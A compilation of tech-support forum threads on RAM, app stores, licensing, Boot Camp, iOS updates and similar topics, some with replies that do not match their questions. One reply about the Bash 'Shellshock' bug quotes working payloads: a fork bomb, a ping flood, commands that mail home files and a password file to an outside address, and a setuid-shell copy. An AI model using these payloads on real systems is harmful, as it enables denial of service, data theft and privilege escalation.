Why are there no Cas2 certified Ram for the KT4V

I've been using XMS3500C2  2 x 256MB (slot 1 and 3)
with absolutely no problems. Is there a problem that I'm not aware using cas2 because there's no cas2 ram certified for this board and I'm curious to know why.

Because it's easier to certify RAM at CL2.5 than CL2.0, and the bigger the list of certified RAM, the better the marketing.
Gee I'm cynical tonight.

  • Why are there virtually no mobile apps for the Android operating system?

I am trying to find mobile apps for my android tablet. Why are there virtually no mobile apps for this system?

Adobe's attitude is not only incredibly insulting and ignorant, it is also short-sighted, particularly considering the top android handsets would actually allow their apps to be more flexible and powerful as they have more RAM at their disposal and the very popular Galaxy Note series would be a perfect device with its integral stylus. This is not acceptable and makes me reconsider staying with my CC subscription. I guess it is time to start looking for adobe alternatives or at the very least demand a discount in our subscription as we are unable to use a large chunk of the subscription portfolio.

  • Why are there so many more choices on the USA iTunes Store? Surely having an iTunes account should let you access all itunes availability the world over? Also how do you request films/tv series to the UK itunes?

Why are there so many more choices on the USA iTunes Store? Surely having an iTunes account should let you access all itunes availability the world over?
Also how do you request films/tv series to the UK itunes? There's tv series I'd like but they're incomplete like The Batman & Xena Warrior Princess. And films theta aren't available for download but you can purchase in a store like HMV?  Apple isn't doing itself any favours by secluding countries by their store. They'd make billions if you could just select the iTunes Store you want to search & purchase from just by signing in! If anything what they're doing is putting themselves into a corner, other companies like Samsung & HTC are already on too of them for innovation & ease of use. The people they're attracting are predominantly existing Apple users not new customers. What do you guys think?

It's not Apple's choice, they can only sell a particular item where the content provider/rights-holder has granted them a license to sell them. Content is licensed by the rights-holders to Apple on a country-by-country basis, each country therefore has to have its own store, and you have to be in a country to use its store - they want control over where their content is available.
You can try requesting that an item be added to the UK store via this page, but unless the rights-holder agrees to then Apple won't be able to sell it here : http://www.apple.com/feedback/itunes.html

  • Why are there so many different prices for RDS CALS

I'm needing Windows Server 2008 r2 with 10 server CALS and 10 RDS CALS. When I search for a source online I see 10 RDS CALS selling as low as 220.00 and as high as 500.00.
My question is: How do I know the lower priced item is the same as the higher prices item?

    Hi,
Microsoft has multiple licensing programs, each targeted at specific types of organizations, with different qualifications to join and different pricing.  For example, there is a licensing program for non-profits that allows
them to purchase licenses at a greatly reduced price.  The page below provides information on the different licensing programs:

Below is sample pricing for a small commercial company purchasing via Open Business licensing program, Per User based licensing, based on your scenario.  After purchasing you would log on to the VLSC site to download Server 2008 R2 installation

I recommend you contact a large Microsoft reseller that serves your area and ask to speak to Microsoft volume licensing specialist. They can help you determine the correct licensing program for your business, give you the correct part#s, etc.

  • Why is there no Boot Camp support for the 64-bit version of Windows 7 on the 64-bit iMac that I'm using?

    The early 2008 24" iMac 8,1 has a 2.8 ghz E8235 Intel Core 2 Duo processor with a data width of 64-bits.
I am straining badly to understand why Apple is only providing drivers for the 32-bit version of Windows 7 for the 64-bit hardware that I want to install it on.

The 64 bit drivers are there, but there have been some installation
issues depending on Windows OS and Apple hardware.  You may
want to post on the Bootcamp forum to get more direct response to
    your issue.
FWIW, at one point, I forget when, I found I needed to manually
open the 64 bit versions of the drivers to install them that were created
on the bootcamp driver install disk (image).  As I recall the was a
64 bit .msi "global" installer but even at that there was an individual
one that needed to be manually installed.
Its been a while since I last did this since I have been doing everything
in Windows virtual machines with Parallels.

  • Why is there no iOS 6 update for the iPad 1?

Does anyone know why the original iPad can't be updated with iOS 6?

The decision to support the 3GS instead of the iPad (which has a faster processor) has been open to wide debate. General consensus has been that the iPad is no longer sold, whereas the 3GS still is. However many people, especially developers, have stated that although the iPad has superior hardware, its hardware is still proportionally weaker than the 3GS. The iPad has more than quadruple the pixels to power than the 3GS, yet still uses the same graphics processor. The iPad also has the same amount of RAM, 256 MB, which in proportion to its screen resolution, is hardly enough. The only hardware advantage the iPad has is a faster processor. However, the processor is not enough to make up for the lack of RAM and graphics power. As a result, there have been numerous complaints on the performance of iOS 5 on the iPad. The 3GS, on the other hand, had generally positive reviews of smooth performance on iOS 5 (some even claim better performance), making it still a good candidate for iOS 6. Last week, Apple announced that they will no longer be selling and supporting the iPhone 3GS, therefore meaning iOS 6 will be the final iOS to support the 3GS.

Most websites these days require the Flash 9 plug-in, and yet

Why is this the case, and if it is posssible to update it,
please tell me how to do it

  • [SOLVED] Why is there a PKGBUILD made available for the Android SDK?

Hello all my fellow Arch users.
I'm just curious as to WHY there's a PKGBUILD in the AUR made available for the Android SDK. I mean, it's already made available at the Android Developer's website, and the only things you'd need are Java, Python, and 32-bit application support, and correct me if I'm wrong, but usually you have the option to install those the moment you're selecting packages for Arch Linux while you're installing them.
I don't have anything against the PKGBUILD, it saved me a load of headaches trying to configure the SDK, and limited my pains to merely editing my .bashrc file to include the full path to the Android SDK tools and platform tools folders.
I find it strange. But then again, I find the concept of an i686-optimized GNU/Linux operating system that leaves all the major configuration to me that also kicks major ass strange as well.

My brain refuses to form an adequate answer to your question. Downloading $APPLICATION from the developers website, extracting it, manually solving dependencies, figuring out a good path to put it and symlink it to /usr/bin is exactly what you do not want to do on an Arch Linux system, therefore you create a PKGBUILD, which enables pacman to know about the package. Just because it does not need to be compiled, does not mean it is a bad idea to create a PKGBUILD. If this is not the purpose of the AUR, then I must have gotten it wrong entirely.
Maybe if you took another AUR package (of your choice) and compared it to the Android SDK PKGBUILD, I could comprehend what's different about this one.
ouch, i was just wondering. i did migrate here from ubuntu after all. but i was just curious, because it reminded me of the android sdk installer gentoo had when i was still running it on a virtual machine a few months ago.

  • Are there 4 or 5 CDs for the CS suite?

I have CS version 1. It came with 5 CDs: 2 for install and 3 for Extras. However, the 3 Extras are Disk 1, Disk 2, & a duplicate of Disk 2.
Should there be a Disk 3 for Extras, or should there actually be only 2 CDs and somehow I got a redundant Disk 2?

My version of CS Premium has six discs - Two Installers, Two Resources and Extras, One Adobe PageMaker Plug-in Pack (whatever that is) and One Video Workshop Training CD.

  • Why isnt there an XFDL file reader for the MacBook BUT there is one for the iPhone

This has been a long going issue for us military folk. A lot of our official forms are XFDL files and its really had to do work on our Mac Books when there isn't a reader for this file except on the iPhone and iPad. Many of us have moved from windows to the Apple products...BUT...the military is still stuck in the past and still using Windows and windows programs. PLEASE HELP.

Thank you for the suggestion, however is this also happening on a specific site?

  • Are there any updates to OSX for the "Bash" virus?

When will there be a update to combat the "Bash" virus?

You are actually completely wrong, a malicous website could do anything from sending a fork bomb to your computer to opening a shell and controlling your computer completely: examples from stackexchange:::
With access to bash, even from the POV of a web user, the options are endless. For example, here's a fork bomb:
    () { :; }; :(){ :|: & };:
Just put that in a user agent string on a browser, go to your web page, and instant DoS on your web server.
Or, somebody could use your server as an attack bot:
    () { :; }; ping -s 1000000 <victim IP>
Put that on several other servers and you're talking about real bandwidth.
    Other attack vectors:
    # theft of data () { :; }; mail -s "Your files" [email protected] | find ~ -print () { :; }; mail -s "This password file" [email protected] | cat ~/.secret/passwd # setuid shell () { :; }; cp /bin/bash /tmp/bash && chmod 4755 /tmp/bash
There's endless other possibilities: reverse shells, running servers on ports, auto-downloading some rootkit to go from web user to root user. It's a shell! It can do anything. As far as security disasters go, this is even worse than Heartbleed.

  • Are there any wall mount brackets for the new iMac 27" 5k?

I have a wall mount (Bretford) for my Cinema HD Display that I have been using since 2008.  I just purchased the new iMac 27inch 5k computer.  It would be great to be able to use this computer with the wall mount.  The ones that are available (VESA) from the apple store and say they will work with some older iMacs.  My question is are there any available for the iMac I purchased? Thanks.

Hi. The VESA mounts for the iMacs are not "changeable": either you buy an iMac with a pedestal, either you buy one with a VESA mount, but you cannot switch, because the VESA mount is the first thing built in the iMac. You would need to sell your 5K iMac and buy a VESA 5K iMac.
